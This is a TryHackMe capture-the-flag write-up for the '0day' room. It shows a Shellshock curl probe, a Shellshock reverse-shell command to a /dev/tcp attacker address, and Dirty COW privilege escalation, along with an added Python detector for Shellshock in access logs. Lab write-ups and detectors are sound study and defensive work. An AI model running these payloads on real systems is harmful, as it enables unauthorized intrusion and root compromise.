0DAY-TRYHACKME

This is the write-up for the room named 0day on TryHackMe.

The room can be found here :- https://tryhackme.com/room/0day

Details given:

Exploit Ubuntu, like a Turtle in a Hurricane. Root my secure Website, take a step into the history of hacking.

What is required?:

user.txt and root.txt

Enumeration

NMAP:

As always, let's start by scanning the target with the IP given:

nmap -sC -sV 10.10.119.34

We have port 22 (SSH) and port 80 (HTTP) open with the versions shown above. Let's enumerate port 80 further using Nikto.

NIKTO:

nikto -h 10.10.119.34

The above Nikto scan reveals that this box is vulnerable to Shellshock. This is a very famous bug in bash, and according to Wikipedia (https://en.wikipedia.org/wiki/Shellshock_(software_bug)):

"Shellshock, also known as Bashdoor, is a family of security bugs in the Unix Bash shell, the first of which was disclosed on 24 September 2014. Shellshock could enable an attacker to cause Bash to execute arbitrary commands and gain unauthorized access to many Internet-facing services, such as web servers, that use Bash to process requests."

The Nikto scan also revealed a few interesting web directories like /admin, /backup and /secret. Let's keep that in mind; if required we can come back to these directories later for further enumeration.

We can use cURL to enumerate further and test whether the target is actually vulnerable to Shellshock.

SHELLSHOCK:

curl http://10.10.119.34/cgi-bin/test.cgi -H "Referer: () { test;}; echo 'Content-Type: text/plain'; echo; echo; /usr/bin/id; exit"

This outputs www-data as the user, confirming that the CGI script is exploitable via Shellshock.

Exploit

SHELLSHOCK:

Let's exploit Shellshock and get a reverse shell using the following command:

curl -v http://10.10.119.34/cgi-bin/test.cgi -H "Referer: () { test;}; echo 'Content-Type: text/plain'; echo; echo; /bin/bash -i >& /dev/tcp/10.8.98.192/9999 0>&1"

We get our reverse shell and thus our user flag in ryan’s home directory :- THM{Sh********_*****}
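Both requests above (the /usr/bin/id probe and the reverse-shell request) leave the same trace on the web server: a Referer header beginning with a bash function definition, "() { ...};", aimed at a script under /cgi-bin/. The following Python script is an added example, not part of this write-up or of the room, showing how a defender can pick those requests out of a combined-format access log. The log lines are constructed for the example (they reuse the attacker and target IPs from the write-up); the combined log layout and the "() {" payload prefix come from the Apache log format and the Shellshock bug itself.

```python
import re
from typing import Dict, List, Optional

# Apache/nginx "combined" log format:
#   ip - - [timestamp] "METHOD path proto" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"'
)

# A Shellshock payload is a bash function definition smuggled into an environment
# variable (CGI copies request headers into the environment): it starts with "() {",
# closes the body with "};" and then carries the commands that a vulnerable bash ran
# while importing the variable. The original bug needed the value to start with exactly
# "() {"; the pattern is kept slightly wider so obvious whitespace variants are caught too.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{.*?\}\s*;")


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Split one combined-format access-log line into fields, or None if it does not parse."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def is_shellshock_payload(value: str) -> bool:
    """True if a header value carries the '() { ...};' function-definition prefix."""
    return SHELLSHOCK_RE.search(value) is not None


def scan_log(lines: List[str]) -> List[Dict[str, str]]:
    """Return one finding per request whose Referer or User-Agent looks like Shellshock.

    Each finding records the source IP, the requested path, which header carried the
    payload and whether the path points at a CGI script (the usual execution route).
    """
    findings: List[Dict[str, str]] = []
    for line in lines:
        fields = parse_line(line)
        if fields is None:
            continue  # unparseable line: skip rather than crash the sweep
        for header in ("referer", "agent"):
            if is_shellshock_payload(fields[header]):
                findings.append({
                    "ip": fields["ip"],
                    "path": fields["path"],
                    "header": header,
                    "payload": fields[header],
                    "cgi_target": "yes" if "/cgi-bin/" in fields["path"] else "no",
                })
    return findings


# Constructed sample log lines (not taken from the room); line 2 mirrors the probe
# used in the write-up, line 3 shows the same prefix arriving in the User-Agent.
SAMPLE_LOG = [
    '10.8.98.192 - - [22/Oct/2020:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 612 "-" "Mozilla/5.0"',
    '10.8.98.192 - - [22/Oct/2020:10:00:07 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 200 51 '
    '"() { test;}; echo \'Content-Type: text/plain\'; echo; echo; /usr/bin/id; exit" "curl/7.72.0"',
    '10.8.98.192 - - [22/Oct/2020:10:00:12 +0000] "GET /admin/ HTTP/1.1" 404 278 "-" '
    '"() { :;}; echo vulnerable"',
    '10.8.98.192 - - [22/Oct/2020:10:00:15 +0000] "GET /secret/ HTTP/1.1" 200 1024 '
    '"http://10.10.119.34/" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ip']} -> {f['path']} [{f['header']}] cgi={f['cgi_target']}: {f['payload']}")
```

Run against the sample it reports two hits: the probe against /cgi-bin/test.cgi (Referer, CGI target) and the User-Agent variant against /admin/. The second one would not execute anything unless a CGI script was behind the path, but it still shows someone scanning for the bug, which is the point of alerting on the prefix rather than on the commands that follow it.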

Privilege Escalation

DIRTY COW:

Use Linux Exploit Suggester from https://github.com/mzet-/linux-exploit-suggester/blob/master/linux-exploit-suggester.sh, which suggests that the box is vulnerable to the dirtyc0w vulnerability.

Again, this is a very famous vulnerability; read more details about it here:- https://dirtycow.ninja/

This can be used for privilege escalation, and a working exploit that worked for this box is available here: https://gist.github.com/rverton/e9d4ff65d703a9084e85fa9df083c679

The target is an x64 machine and we faced problems compiling the exploit on the target.

www-data@ubuntu:/tmp$ cat /proc/version
cat /proc/version
Linux version 3.13.0-32-generic (buildd@kissel) (gcc version 4.8.2 (Ubuntu 4.8.2-19ubuntu1) ) #57-Ubuntu SMP Tue Jul 15 03:51:08 UTC 2014

So we compile the exploit locally on Kali and transfer it to the target.

┌──(kali㉿kali)-[/opt/tools/exploits]
└─$ gcc cowroot.c -o cowroot -pthread

Running ./cowroot on the target gives us a root shell and the root flag in /root :- THM{g00d********************}

Originally published at https://basicpentesting.blogspot.com on October 22, 2020.

0xsanz

Software Developer having keen interest in Security, Privacy and Pen-testing. Certs:- Security+, PenTest+, AZ900
